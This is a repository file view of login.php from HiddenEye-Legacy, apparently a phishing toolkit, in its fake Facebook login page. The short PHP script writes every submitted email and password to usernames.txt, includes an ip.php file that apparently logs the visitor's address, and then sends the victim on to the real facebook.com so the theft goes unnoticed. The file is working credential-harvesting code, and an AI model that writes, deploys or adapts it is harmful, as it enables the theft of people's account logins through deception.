HiddenEye-Legacy/WebPages/fb_standard/login.php
Usama Abdul Sattar afce4e12eb
Update login.php
2018-06-08 16:54:43 +05:00

7 lines
194 B
PHP

<?php
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
header('Location: https://facebook.com/');
exit();